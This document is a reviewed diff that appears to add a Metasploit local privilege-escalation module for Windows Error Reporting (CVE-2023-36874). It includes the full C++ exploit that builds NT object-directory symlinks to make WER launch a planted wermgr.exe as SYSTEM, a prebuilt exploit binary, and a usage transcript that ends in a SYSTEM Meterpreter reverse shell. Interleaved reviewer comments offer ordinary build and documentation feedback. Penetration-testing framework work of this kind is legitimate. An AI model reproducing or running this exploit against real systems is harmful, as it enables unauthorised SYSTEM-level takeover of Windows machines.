diff --git a/LICENSE b/LICENSE
index b962101a8aa2..22ed72e7e413 100644
--- a/LICENSE
+++ b/LICENSE
@@ -80,6 +80,13 @@ Files: exteneral/source/exploits/CVE-2022-26904/*
Copyright: 2022 Abdelhamid Naceri
License: MIT
+Files: external/source/exploits/CVE-2023-36874/*
+Copyright: 2023 Octoberfest7
+License: MIT
+Purpose: Library and error report file are required for calculating offsets to the correct
+ function calls to implement the exploit. The heavily modified C main is necessary
+ to create and trigger the exploit.
+
Files: external/source/exploits/drunkpotato/Common_Src_Files/spnegotokenhandler/*
Copyright: 2011 Jon Bringhurst
License: GNU GPL 2.0
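Review bot: the new `Files:` entry covers only `external/source/exploits/CVE-2023-36874/*`, yet its `Purpose:` text describes the error report file, which this patch adds under `data/exploits/CVE-2023-36874/Report.wer` next to the prebuilt `CVE-2023-36874.exe`; add a matching entry (or widen the glob) so the data files are covered as well. `Purpose:` is also a field the surrounding entries do not use (they carry only `Files:`, `Copyright:` and `License:`), so either drop it or confirm the license tooling tolerates it. The copyright line names only Octoberfest7, while the module's author list credits Filip Dragović (Wh04m1001) for the original PoC; if the C++ derives from both, list both here.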
diff --git a/data/exploits/CVE-2023-36874/CVE-2023-36874.exe b/data/exploits/CVE-2023-36874/CVE-2023-36874.exe
new file mode 100755
index 000000000000..77a906f82442
Binary files /dev/null and b/data/exploits/CVE-2023-36874/CVE-2023-36874.exe differ
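Review bot: a prebuilt `CVE-2023-36874.exe` is committed with nothing tying it to the source added under `external/source/exploits/CVE-2023-36874`; state in the PR (or in a short README beside the binary) which solution configuration produced it, since the project offers Debug and Release for both Win32 and x64, so a reviewer can rebuild from the checked-in `.sln` and compare the result against the committed file.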
diff --git a/data/exploits/CVE-2023-36874/Report.wer b/data/exploits/CVE-2023-36874/Report.wer
new file mode 100644
index 000000000000..e9b7fd6342c7
Binary files /dev/null and b/data/exploits/CVE-2023-36874/Report.wer differ
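Review bot: `Report.wer` lands as an opaque binary, so its contents cannot be reviewed in the diff; document (in the LICENSE `Purpose:` text or the module docs) how it was produced and which of its fields the exploit depends on, because the module writes this one file both to the real `ReportArchive` directory and to the shadow copy via `exploit_data('CVE-2023-36874', 'Report.wer')`.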
diff --git a/documentation/modules/exploit/windows/local/win_error_cve_2023_36874.md b/documentation/modules/exploit/windows/local/win_error_cve_2023_36874.md
new file mode 100644
index 000000000000..2fc00cf776d5
--- /dev/null
+++ b/documentation/modules/exploit/windows/local/win_error_cve_2023_36874.md
@@ -0,0 +1,98 @@
+## Vulnerable Application
+This module works only on Windows 10x64 22H2
+
+### Introduction
+
+This module takes advantage of a bug in the way Windows error reporting opens the report
+parser. If you open a report, Windows uses a relative path to locate the rendering program.
+By creating a specific alternate directory structure, we can coerce Windows into opening an
+arbitrary executable as SYSTEM.
+If the current user is a local admin, the system will attempt impersonation and the exploit will
+fail. Because the payload is added to a directory this module creates, in the event of successful
+exploitation, the user will need to delete the payload and the directories containing the payload
+manually.
+
+This module will attempt to delete the payload it uploads and the directory structure.
+
+## Installation Instructions
+1. Install Windows 10x64 22H2
+1. Create a standard user
+
+
+## Verification Steps
+
+1. Create a session on the target system under the context of a non local administrative user.
+1. Begin interacting with the module: `use exploit/windows/local/win_error_cve_2023_36874`.
+1. Set the `PAYLOAD` and configure it correctly.
+1. If an existing handler is configured to receive the elevated session, then the module's
+ handler should be disabled: `set DisablePayloadHandler true`.
+1. Make sure that the `SESSION` value is set to the existing session identifier.
+1. Invoke the module: `run`.
+
+
+## Options
+1. `EXPLOIT_NAME` The filename to use for the exploit binary (%RAND%.exe by default)
+1. `REPORT_DIR` The Error Directory to use (%RAND% by default).
+1. `REPORT_NAME` The Error report name (%RAND% by default).
+1. `SHADOW_DRIVE` Directory to place in the home drive for pivot (%TEMP% by default).
+1. `EXECUTE_DELAY` The number of seconds to delay between file upload and exploit launch. Default is 3.
+
+## Scenarios
+
+### Windows 10.0.19045.2006 x64 (Windows 10x64 22H2)
+
+```
+msf6 exploit(windows/local/win_error_cve_2023_36874) > run
+
+[*] Started reverse TCP handler on 10.5.135.201:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] OS version: Windows 10+ Build 19045
+[+] The target appears to be vulnerable.
+[*] Shadow Path = C:\NpIWBsCJozK
+[*] Attempting to PrivEsc on DESKTOP-V413087 via session ID: 1
+[*] C:\ProgramData
+[*] Creating C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport
+[*] Creating directory C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport
+[*] C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport created
+[*] Writing Report to C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport\Report.wer
+[*] Creating directory C:\NpIWBsCJozK
+[*] C:\NpIWBsCJozK created
+[*] Creating directory C:\NpIWBsCJozK\ProgramData\
+[*] C:\NpIWBsCJozK\ProgramData\ created
+[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\
+[*] C:\NpIWBsCJozK\ProgramData\Microsoft\ created
+[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\
+[*] C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\ created
+[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\
+[*] C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ created
+[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\
+[*] C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\ created
+[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport
+[*] C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport created
+[*] Writing bad Report to C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport\Report.wer
+[*] Creating C:\NpIWBsCJozK\system32
+[*] Creating directory C:\NpIWBsCJozK\system32
+[*] C:\NpIWBsCJozK\system32 created
+[*] Writing payload to C:\NpIWBsCJozK\system32\wermgr.exe
+[*] shadow_path = NpIWBsCJozK
+[*] Exploit uploaded on DESKTOP-V413087 to C:\NpIWBsCJozK\fShpLfYh.exe
+[*] Sending stage (200774 bytes) to 10.5.132.118
+[+] Deleted C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport
+[*]
+[+] Deleted C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\
+[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.118:62415) at 2023-09-19 15:43:02 -0500
+[-] Failed to delete C:\NpIWBsCJozK\system32: stdapi_fs_delete_dir: Operation failed: The directory is not empty.
+
+meterpreter > sysinfo
+Computer : DESKTOP-V413087
+OS : Windows 10 (10.0 Build 19045).
+Architecture : x64
+System Language : en_US
+Domain : WORKGROUP
+Logged On Users : 4
+Meterpreter : x64/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > exit
+
+```
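Review bot: the cleanup paragraph contradicts itself: the first paragraph says the user must delete the payload and its directories manually, the next sentence says the module will attempt to delete them, and the module in this PR registers nothing for cleanup and only prints "Manual deletion of ... may be required"; keep the one statement that matches the code. Under `## Options`, `REPORT_NAME` is documented but the module does not register it, and `SHADOW_DRIVE` is said to default to `%TEMP%` whereas the module defaults it to a random alpha string; fix both. "Windows 10x64 22H2" should read "Windows 10 x64 22H2" in all three places. The scenario transcript shows `[+] Deleted ...` lines and a `MyReport` directory that the submitted module cannot produce (no deletion code, random `REPORT_DIR` default), so re-capture the run against the final module so the output matches what the code does.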
diff --git a/external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874.sln b/external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874.sln
new file mode 100755
index 000000000000..d39f192c0b7c
--- /dev/null
+++ b/external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874.sln
@@ -0,0 +1,31 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.32929.386
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2023-36874", "CVE-2023-36874\CVE-2023-36874.vcxproj", "{4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|x64 = Debug|x64
+ Debug|x86 = Debug|x86
+ Release|x64 = Release|x64
+ Release|x86 = Release|x86
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Debug|x64.ActiveCfg = Debug|x64
+ {4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Debug|x64.Build.0 = Debug|x64
+ {4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Debug|x86.ActiveCfg = Debug|Win32
+ {4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Debug|x86.Build.0 = Debug|Win32
+ {4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Release|x64.ActiveCfg = Release|x64
+ {4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Release|x64.Build.0 = Release|x64
+ {4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Release|x86.ActiveCfg = Release|Win32
+ {4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Release|x86.Build.0 = Release|Win32
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+ GlobalSection(ExtensibilityGlobals) = postSolution
+ SolutionGuid = {A022017A-2A80-4E35-A696-EB6884E52E5E}
+ EndGlobalSection
+EndGlobal
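Review bot: `CVE-2023-36874.sln`, the `.vcxproj`, the `.vcxproj.filters`, `cve_2023_36874.cpp` and `def.h` are all added with mode `100755`; source and project files should be `100644`, with only the `.exe` carrying the executable bit. The solution also defines `Debug|x86` and `Release|x86` configurations although the module targets `ARCH_X64` only, so they are build variants nobody will test; drop them. The source sits three directories deep (`CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/`), which is Visual Studio's default "create directory for solution" layout; flattening to a single level keeps the paths manageable.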
diff --git a/external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874.vcxproj b/external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874.vcxproj
new file mode 100755
index 000000000000..a0e52bf8cdfd
--- /dev/null
+++ b/external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874.vcxproj
@@ -0,0 +1,152 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ 16.0
+ Win32Proj
+ {4cbf3aca-76e5-4c6a-9483-ca2adc6eaf6b}
+ CVE202336874
+ 10.0
+
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ true
+
+
+ false
+
+
+ true
+
+
+ false
+
+
+
+ Level3
+ true
+ WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
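Review bot: only the two x64 configurations set the `MultiThreaded` runtime library (static CRT), which is what keeps the shipped exe from depending on the Visual C++ redistributable on the target; the two Win32 configurations omit it, so an x86 build would carry that dependency. Either add the setting there or remove the Win32 configurations, since only x64 is targeted. The file is also missing its trailing newline.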
diff --git a/external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874.vcxproj.filters b/external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874.vcxproj.filters
new file mode 100755
index 000000000000..8c78e089aab1
--- /dev/null
+++ b/external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874.vcxproj.filters
@@ -0,0 +1,27 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+ Source Files
+
+
+
+
+ Header Files
+
+
+
\ No newline at end of file
diff --git a/external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/cve_2023_36874.cpp b/external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/cve_2023_36874.cpp
new file mode 100755
index 000000000000..2cf89c83f9a4
--- /dev/null
+++ b/external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/cve_2023_36874.cpp
@@ -0,0 +1,131 @@
+#include "def.h"
+
+int wmain(int argc, wchar_t** argv)
+
+{
+ IWerReport* pIWerReport = NULL;
+ IErcLuaSupport* pIErcLuaSupport = NULL;
+ IWerStoreFactory* pIWerStoreFactory = NULL;
+ IWerStore* pIWerStore = NULL;
+ IWerReportSubmitCallback* pIWerSubmitCallback = NULL;
+ HRESULT result = 0;
+ HMODULE hm = GetModuleHandle(NULL);
+ UNICODE_STRING symlink_name;
+ UNICODE_STRING path;
+ UNICODE_STRING object;
+ OBJECT_ATTRIBUTES objAttrLink, objAttrDir;
+ HANDLE hSymlink, hObjectdir, hSymlinkWindows, hSymlinkProgramdata;
+ HMODULE ntdll = LoadLibraryW(L"ntdll.dll");
+ WCHAR ntdcoDir[128] = { 0 };
+ WCHAR ntdcoDir_1[128] = { 0 };
+ pNtCreateSymbolicLinkObject = (_NtCreateSymbolicLinkObject)GetProcAddress(ntdll, "NtCreateSymbolicLinkObject");
+ pRtlInitUnicodeString = (_RtlInitUnicodeString)GetProcAddress(ntdll, "RtlInitUnicodeString");
+ pNtCreateDirectoryObject = (_NtCreateDirectoryObject)GetProcAddress(ntdll, "NtCreateDirectoryObject");
+
+ result = CoInitialize(NULL);
+
+ BSTR data = SysAllocString(argv[1]);
+ //BSTR report = SysAllocString(L"testing");
+ BSTR report = SysAllocString(argv[3]);
+
+ if (FAILED(result))
+ {
+ printf("Error: CoInitialize 0x%x\n", result);
+ return -1;
+ }
+
+ result = CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE, NULL);
+
+ if (FAILED(result))
+ {
+ printf("Error: CoInitializeSecurity 0x%x\n", result);
+ return -1;
+ }
+ result = CoCreateInstance(__uuidof(CLSID_IErcLuaSupport), NULL, CLSCTX_LOCAL_SERVER, __uuidof(IErcLuaSupport), (PVOID*)&pIErcLuaSupport);
+ if (FAILED(result))
+ {
+ printf("Error CoCreateInstance: 0x%x\n", result);
+ return -1;
+ }
+
+ result = pIErcLuaSupport->Proc3(&pIWerStoreFactory);
+ if (FAILED(result))
+ {
+ printf("Error pIErcLuaSupport: 0x%x\n", result);
+ return -1;
+ }
+
+ result = pIWerStoreFactory->Proc4(&pIWerStore);
+ if (FAILED(result))
+ {
+ printf("Error pIWerStoreFactory: 0x%x\n", result);
+ return -1;
+ }
+
+ result = pIWerStore->Proc3();
+ if (FAILED(result))
+ {
+ printf("Error pIWerStore(Proc3) : 0x%x\n", result);
+ return -1;
+ }
+
+ result = pIWerStore->Proc6(report, &pIWerReport);
+ if (FAILED(result))
+ {
+ printf("Error pIWerStore(Proc6): 0x%x\n", result);
+ return -1;
+ }
+ int64_t ret = 0;
+
+ ZeroMemory(ntdcoDir, 128);
+ swprintf_s(ntdcoDir, 128, L"\\??\\%ls", argv[1]);
+ pRtlInitUnicodeString(&object, ntdcoDir);
+
+ InitializeObjectAttributes(&objAttrDir, &object, OBJ_CASE_INSENSITIVE, NULL, NULL);
+ pNtCreateDirectoryObject(&hObjectdir, 0xF000F, &objAttrDir);
+
+ pRtlInitUnicodeString(&symlink_name, L"Windows");
+ ZeroMemory(ntdcoDir, 128);
+ swprintf_s(ntdcoDir, 128, L"\\GLOBAL??\\%ls\\%ls", argv[2], argv[1]);
+ pRtlInitUnicodeString(&path, ntdcoDir);
+
+ InitializeObjectAttributes(&objAttrLink, &symlink_name, OBJ_CASE_INSENSITIVE, hObjectdir, NULL);
+ pNtCreateSymbolicLinkObject(&hSymlinkWindows, 0xF0001, &objAttrLink, &path);
+
+ ZeroMemory(&objAttrLink, sizeof(objAttrLink));
+ ZeroMemory(&symlink_name, sizeof(symlink_name));
+ ZeroMemory(&path, sizeof(UNICODE_STRING));
+
+ pRtlInitUnicodeString(&symlink_name, L"ProgramData");
+ ZeroMemory(ntdcoDir, 128);
+ swprintf_s(ntdcoDir, 128, L"\\GLOBAL??\\%ls\\Programdata", argv[2]);
+ pRtlInitUnicodeString(&path, ntdcoDir);
+ InitializeObjectAttributes(&objAttrLink, &symlink_name, OBJ_CASE_INSENSITIVE, hObjectdir, NULL);
+ pNtCreateSymbolicLinkObject(&hSymlinkProgramdata, 0xF0001, &objAttrLink, &path);
+
+ ZeroMemory(&objAttrLink, sizeof(objAttrLink));
+ ZeroMemory(&symlink_name, sizeof(symlink_name));
+ ZeroMemory(&path, sizeof(UNICODE_STRING));
+
+ ZeroMemory(ntdcoDir, 128);
+ swprintf_s(ntdcoDir, 128, L"\\??\\%ls", argv[2]);
+ pRtlInitUnicodeString(&symlink_name, ntdcoDir);
+
+ ZeroMemory(ntdcoDir_1, 128);
+ swprintf_s(ntdcoDir_1, 128, L"\\??\\%ls", argv[1]);
+ pRtlInitUnicodeString(&path, ntdcoDir_1);
+
+ InitializeObjectAttributes(&objAttrLink, &symlink_name, OBJ_CASE_INSENSITIVE, NULL, NULL);
+ pNtCreateSymbolicLinkObject(&hSymlink, 0xF0001, &objAttrLink, &path);
+ result = pIWerReport->Proc24(report, 1024, NULL, &data, &ret);
+ if (FAILED(result))
+ {
+ printf("Error pIWerReport: 0x%x\n", result);
+ return -1;
+ }
+ Sleep(2000);
+ CloseHandle(hSymlink);
+ CloseHandle(hObjectdir);
+ CloseHandle(hSymlinkProgramdata);
+ CloseHandle(hSymlinkWindows);
+}
\ No newline at end of file
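Review bot: `argc` is never checked, but `argv[1]`, `argv[2]` and `argv[3]` are dereferenced (`BSTR data = SysAllocString(argv[1]);`, `BSTR report = SysAllocString(argv[3]);` and the `swprintf_s` calls), so running the binary with fewer than three arguments dereferences NULL; add an `if (argc < 4)` guard at the top of `wmain` that prints the expected arguments and returns. The three `GetProcAddress` results are used without a NULL check, and none of the `pNtCreateDirectoryObject` / `pNtCreateSymbolicLinkObject` calls have their `NTSTATUS` inspected, so a failure to build the object directory or a link goes unreported and `Proc24` is invoked regardless; check each status and bail out with the value printed. Resource handling is incomplete: there is no `CoUninitialize`, no `SysFreeString` for `data` and `report`, no `Release()` on the four acquired interfaces, and `CloseHandle` is called on handles that may never have been populated if the preceding calls failed. Dead code to remove: `HMODULE hm`, the unused `pIWerSubmitCallback`, and the commented-out `//BSTR report = SysAllocString(L"testing");`. The file also lacks a trailing newline.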
diff --git a/external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/def.h b/external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/def.h
new file mode 100755
index 000000000000..c008c098b62a
--- /dev/null
+++ b/external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/def.h
@@ -0,0 +1,94 @@
+#include
+#include
+#include
+#include
+
+
+
+struct __declspec(uuid("0e9a7bb5-f699-4d66-8a47-b919f5b6a1db")) CLSID_IErcLuaSupport;
+
+class __declspec(uuid("a7a3dd4c-defc-46a2-832e-5a743be69e8c")) IWerReportSubmitCallback : public IUnknown {
+public:
+ virtual HRESULT __stdcall Proc3(/* Stack Offset: 8 */ int64_t* p0);
+ virtual HRESULT __stdcall Proc4(/* Stack Offset: 8 */ int64_t p0);
+ virtual HRESULT __stdcall Proc5(/* Stack Offset: 8 */ int64_t p0, /* Stack Offset: 16 */ int64_t p1);
+};
+
+
+
+class __declspec(uuid("fe6f6e62-fe82-4f7f-947a-7f37b44594ca")) IWerKeyValueList : public IUnknown {
+public:
+ virtual HRESULT __stdcall Proc3(/* Stack Offset: 8 */ int64_t p0, /* Stack Offset: 16 */ BSTR* p1, /* Stack Offset: 24 */ BSTR* p2);
+ virtual HRESULT __stdcall Proc4(/* Stack Offset: 8 */ int64_t* p0);
+};
+
+
+
+class __declspec(uuid("6764c32a-97a5-44ec-9bc0-77368c7746b2")) IWerStringList : public IUnknown {
+public:
+ virtual HRESULT __stdcall Proc3(/* Stack Offset: 8 */ int64_t p0, /* Stack Offset: 16 */ BSTR* p1);
+ virtual HRESULT __stdcall Proc4(/* Stack Offset: 8 */ int64_t* p0);
+};
+
+
+class __declspec(uuid("d01b8f28-0bd1-4652-a415-8229f5ee506c")) IWerReport : public IUnknown {
+public:
+ virtual HRESULT __stdcall Proc3(/* Stack Offset: 8 */ int64_t* p0);
+ virtual HRESULT __stdcall Proc4(/* Stack Offset: 8 */ int64_t* p0);
+ virtual HRESULT __stdcall Proc5(/* Stack Offset: 8 */ BSTR* p0);
+ virtual HRESULT __stdcall Proc6(/* Stack Offset: 8 */ IWerKeyValueList** p0);
+ virtual HRESULT __stdcall Proc7(/* Stack Offset: 8 */ IWerKeyValueList** p0);
+ virtual HRESULT __stdcall Proc8(/* Stack Offset: 8 */ IWerStringList** p0);
+ virtual HRESULT __stdcall Proc9(/* Stack Offset: 8 */ int64_t* p0);
+ virtual HRESULT __stdcall Proc10(/* Stack Offset: 8 */ int64_t* p0);
+ virtual HRESULT __stdcall Proc11(/* Stack Offset: 8 */ BSTR* p0);
+ virtual HRESULT __stdcall Proc12(/* Stack Offset: 8 */ BSTR* p0);
+ virtual HRESULT __stdcall Proc13(/* Stack Offset: 8 */ IWerStringList** p0);
+ virtual HRESULT __stdcall Proc14(/* Stack Offset: 8 */ IWerStringList** p0);
+ virtual HRESULT __stdcall Proc15(/* Stack Offset: 8 */ int64_t* p0);
+ virtual HRESULT __stdcall Proc16(/* Stack Offset: 8 */ struct Struct_1* p0);
+ virtual HRESULT __stdcall Proc17(/* Stack Offset: 8 */ int64_t* p0);
+ virtual HRESULT __stdcall Proc18(/* Stack Offset: 8 */ int64_t* p0);
+ virtual HRESULT __stdcall Proc19(/* Stack Offset: 8 */ int64_t* p0);
+ virtual HRESULT __stdcall Proc20(/* Stack Offset: 8 */ BSTR p0, /* Stack Offset: 16 */ BSTR* p1);
+ virtual HRESULT __stdcall Proc21(/* Stack Offset: 8 */ BSTR* p0);
+ virtual HRESULT __stdcall Proc22(/* Stack Offset: 8 */ int64_t p0, /* Stack Offset: 16 */ int64_t* p1, /* Stack Offset: 24 */ int64_t* p2, /* Stack Offset: 32 */ BSTR* p3, /* Stack Offset: 40 */ BSTR* p4);
+ virtual HRESULT __stdcall Proc23(/* Stack Offset: 8 */ int64_t p0, /* Stack Offset: 16 */ BSTR* p1);
+ virtual HRESULT __stdcall Proc24(/* Stack Offset: 8 */ BSTR p0, /* Stack Offset: 16 */ int64_t p1, /* Stack Offset: 24 */ IWerReportSubmitCallback* p2, /* Stack Offset: 32 */ /* unique */BSTR* p3, /* Stack Offset: 40 */ /* unique */int64_t* p4);
+ virtual HRESULT __stdcall Proc25();
+};
+
+class __declspec(uuid("1e3a0e4f-1412-444f-8a94-fc6a09cd4195")) IWerStore : public IUnknown {
+public:
+ virtual HRESULT __stdcall Proc3();
+ virtual HRESULT __stdcall Proc4(/* Stack Offset: 8 */ BSTR* p0);
+ virtual HRESULT __stdcall Proc5(/* Stack Offset: 8 */ BSTR p0);
+ virtual HRESULT __stdcall Proc6(/* Stack Offset: 8 */ BSTR p0, /* Stack Offset: 16 */ IWerReport** p1);
+ virtual HRESULT __stdcall Proc7(/* Stack Offset: 8 */ BSTR p0, /* Stack Offset: 16 */ BSTR* p1);
+};
+
+
+
+class __declspec(uuid("4904c154-426f-4c88-8ec2-4543d18670f7")) IWerStoreFactory : public IUnknown {
+public:
+ virtual HRESULT __stdcall Proc3(/* Stack Offset: 8 */ IWerStore** p0);
+ virtual HRESULT __stdcall Proc4(/* Stack Offset: 8 */ IWerStore** p0);
+};
+
+
+
+class __declspec(uuid("6620c14b-70ae-4d4e-a4f6-91a7dcc582c2")) IErcLuaSupport : public IUnknown {
+public:
+ virtual HRESULT __stdcall Proc3(/* Stack Offset: 8 */ IWerStoreFactory** p0);
+};
+
+
+
+
+typedef NTSYSAPI VOID(NTAPI* _RtlInitUnicodeString)(PUNICODE_STRING DestinationString, PCWSTR SourceString);
+typedef NTSYSAPI NTSTATUS(*_NtCreateSymbolicLinkObject)(PHANDLE pHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PUNICODE_STRING DestinationName);
+typedef NTSYSAPI NTSTATUS(*_NtCreateDirectoryObject)(PHANDLE DirectoryHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes);
+
+_NtCreateSymbolicLinkObject pNtCreateSymbolicLinkObject;
+_RtlInitUnicodeString pRtlInitUnicodeString;
+_NtCreateDirectoryObject pNtCreateDirectoryObject;
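Review bot: as shown in this hunk the four `#include` directives name no header; if that is how the file is committed it will not compile, and it needs at least `<windows.h>`, `<winternl.h>` (for `UNICODE_STRING`, `OBJECT_ATTRIBUTES` and `NTSTATUS`), `<stdint.h>` (`int64_t`) and `<stdio.h>` (the `printf` calls in the `.cpp`). The three function-pointer globals at the bottom (`_NtCreateSymbolicLinkObject pNtCreateSymbolicLinkObject;` and the two following lines) are definitions placed in a header; they only link because a single translation unit includes it, so mark them `static` or declare them `extern` here and define them in `cve_2023_36874.cpp`. `_NtCreateSymbolicLinkObject` and `_NtCreateDirectoryObject` lack the `NTAPI` calling-convention specifier that `_RtlInitUnicodeString` carries; that is harmless on x64 but wrong for the Win32 configurations the project still offers. The interface methods are declared `virtual` without `= 0`; making them pure virtual documents that these classes are vtable shims for COM interfaces and prevents accidental instantiation.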
diff --git a/modules/exploits/windows/local/win_error_cve_2023_36874.rb b/modules/exploits/windows/local/win_error_cve_2023_36874.rb
new file mode 100644
index 000000000000..85903053b7b5
--- /dev/null
+++ b/modules/exploits/windows/local/win_error_cve_2023_36874.rb
@@ -0,0 +1,170 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+ Rank = ExcellentRanking
+
+ include Msf::Post::Common
+ include Msf::Post::File
+ include Msf::Exploit::FileDropper
+ include Msf::Post::Windows::Priv
+ include Msf::Exploit::EXE
+
+ prepend Msf::Exploit::Remote::AutoCheck
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Microsoft Error Reporting Local Privilege Elevation Vulnerability',
+ 'Description' => %q{
+ This module takes advantage of a bug in the way Windows error reporting opens the report
+ parser. If you open a report, Windows uses a relative path to locate the rendering program.
+ By creating a specific alternate directory structure, we can coerce Windows into opening an
+ arbitrary executable as SYSTEM.
+ If the current user is a local admin, the system will attempt impersonation and the exploit will
+ fail.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [
+ 'Filip Dragović (Wh04m1001)', # PoC
+ 'Octoberfest7', # PoC
+ 'bwatters-r7' # msf module
+ ],
+ 'Platform' => ['win'],
+ 'SessionTypes' => [ 'meterpreter', 'shell', 'powershell' ],
+ 'Targets' => [
+ [ 'Automatic', { 'Arch' => [ ARCH_X64 ] } ]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => '2023-07-11',
+ 'References' => [
+ ['CVE', '2023-36874'],
+ ['URL', 'https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/'],
+ ['URL', 'https://github.com/Wh04m1001/CVE-2023-36874'],
+ ['URL', 'https://github.com/Octoberfest7/CVE-2023-36874_BOF']
+ ],
+ 'Notes' => {
+ 'Stability' => [CRASH_SAFE],
+ 'Reliability' => [REPEATABLE_SESSION],
+ 'SideEffects' => [ ARTIFACTS_ON_DISK ]
+ },
+ 'Compat' => {
+ 'Meterpreter' => {
+ 'Commands' => %w[
+ stdapi_fs_delete_file
+ stdapi_sys_config_getenv
+ ]
+ }
+ }
+ )
+ )
+
+ register_options([
+ OptString.new('EXPLOIT_NAME',
+ [true, 'The filename to use for the exploit binary (%RAND%.exe by default).', "#{Rex::Text.rand_text_alpha(6..14)}.exe"]),
+ OptString.new('REPORT_DIR',
+ [true, 'The Error Directory to use (%RAND% by default).', Rex::Text.rand_text_alpha(6..14).to_s]),
